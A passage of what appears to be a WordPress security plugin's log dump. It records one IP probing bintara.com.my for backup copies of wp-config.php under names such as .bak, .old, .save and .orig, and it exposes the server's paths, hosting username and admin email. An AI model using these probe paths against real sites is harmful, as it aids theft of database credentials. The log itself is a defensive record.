;s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQiY3U6542i46IOG7AcQAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853577.7988\";s:12:\"REQUEST_TIME\";s:10:\"1569853577\";}}','notice','2019-09-30 14:26:21','2019-09-30 14:26:18',35182976,36988040,'https://bintara.com.my/wp-config.php~',1,0,'183.110.224.56'),(27348,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/wp-config.php.save\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:40:\"http://bintara.com.my/wp-config.php.save\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.save\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.save\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQqVRs5rARLtASNcvntQAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.save\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.save\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQqVRs5rARLtASNcvntQAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"13394\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.save\";s:10:\"SCRIPT_URL\";s:19:\"/wp-config.php.save\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQqVRs5rARLtASNcvntQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853609.3227\";s:12:\"REQUEST_TIME\";s:10:\"1569853609\";}}','notice','2019-09-30 14:26:51','2019-09-30 14:26:49',35185064,36983744,'https://bintara.com.my/wp-config.php.save',1,0,'183.110.224.56'),(27349,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/wp-config.php_bak\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:39:\"http://bintara.com.my/wp-config.php_bak\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php_bak\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php_bak\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQs68iH4NZMSdRWsZjJwAAAMA\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php_bak\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php_bak\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQs68iH4NZMSdRWsZjJwAAAMA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"13962\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php_bak\";s:10:\"SCRIPT_URL\";s:18:\"/wp-config.php_bak\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQs68iH4NZMSdRWsZjJwAAAMA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853620.0904\";s:12:\"REQUEST_TIME\";s:10:\"1569853620\";}}','notice','2019-09-30 14:27:02','2019-09-30 14:27:00',35181304,36984768,'https://bintara.com.my/wp-config.php_bak',1,0,'183.110.224.56'),(27350,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp-config.bak\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"http://bintara.com.my/wp-config.bak\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.bak\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.bak\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQv68iH4NZMSdRWsZjLQAAAMw\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.bak\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.bak\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQv68iH4NZMSdRWsZjLQAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"14406\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.bak\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.bak\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQv68iH4NZMSdRWsZjLQAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853631.2696\";s:12:\"REQUEST_TIME\";s:10:\"1569853631\";}}','notice','2019-09-30 14:27:13','2019-09-30 14:27:11',35182616,36990320,'https://bintara.com.my/wp-config.bak',1,0,'183.110.224.56'),(27351,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/wp-config.php.bak\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:39:\"http://bintara.com.my/wp-config.php.bak\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php.bak\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php.bak\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQyq8iH4NZMSdRWsZjMAAAAMk\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php.bak\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php.bak\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQyq8iH4NZMSdRWsZjMAAAAMk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"14832\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php.bak\";s:10:\"SCRIPT_URL\";s:18:\"/wp-config.php.bak\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQyq8iH4NZMSdRWsZjMAAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853642.2283\";s:12:\"REQUEST_TIME\";s:10:\"1569853642\";}}','notice','2019-09-30 14:27:25','2019-09-30 14:27:22',35181440,36985144,'https://bintara.com.my/wp-config.php.bak',1,0,'183.110.224.56'),(27352,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.save\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my/wp-config.save\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.save\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.save\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQ2a8iH4NZMSdRWsZjMQAAAME\";s:12:\"REDIRECT_URL\";s:15:\"/wp-config.save\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"15432\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.save\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.save\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQ2a8iH4NZMSdRWsZjMQAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853657.9257\";s:12:\"REQUEST_TIME\";s:10:\"1569853657\";}}','notice','2019-09-30 14:27:40','2019-09-30 14:27:38',35138192,36941704,'https://bintara.com.my/wp-config.save',1,0,'183.110.224.56'),(27353,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp-config.old\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:35:\"http://bintara.com.my/wp-config.old\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.old\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.old\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQ6K8iH4NZMSdRWsZjNQAAANA\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.old\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.old\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQ6K8iH4NZMSdRWsZjNQAAANA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"15980\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.old\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.old\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQ6K8iH4NZMSdRWsZjNQAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853672.7114\";s:12:\"REQUEST_TIME\";s:10:\"1569853672\";}}','notice','2019-09-30 14:27:56','2019-09-30 14:27:53',35575176,37380680,'https://bintara.com.my/wp-config.old',1,0,'183.110.224.56'),(27354,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/wp-config.php.old\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:39:\"http://bintara.com.my/wp-config.php.old\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php.old\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php.old\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIQ968iH4NZMSdRWsZjQAAAANI\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php.old\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php.old\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIQ968iH4NZMSdRWsZjQAAAANI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"16592\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php.old\";s:10:\"SCRIPT_URL\";s:18:\"/wp-config.php.old\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIQ968iH4NZMSdRWsZjQAAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853687.6732\";s:12:\"REQUEST_TIME\";s:10:\"1569853687\";}}','notice','2019-09-30 14:28:09','2019-09-30 14:28:08',35180384,36988704,'https://bintara.com.my/wp-config.php.old',1,0,'183.110.224.56'),(27355,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/wp-config.php.orig\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:40:\"http://bintara.com.my/wp-config.php.orig\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.orig\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.orig\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIRBo3U6542i46IOG7AiAAAAEY\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.orig\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.orig\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIRBo3U6542i46IOG7AiAAAAEY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"17360\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.orig\";s:10:\"SCRIPT_URL\";s:19:\"/wp-config.php.orig\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIRBo3U6542i46IOG7AiAAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569853702.318\";s:12:\"REQUEST_TIME\";s:10:\"1569853702\";}}','notice','2019-09-30 14:28:24','2019-09-30 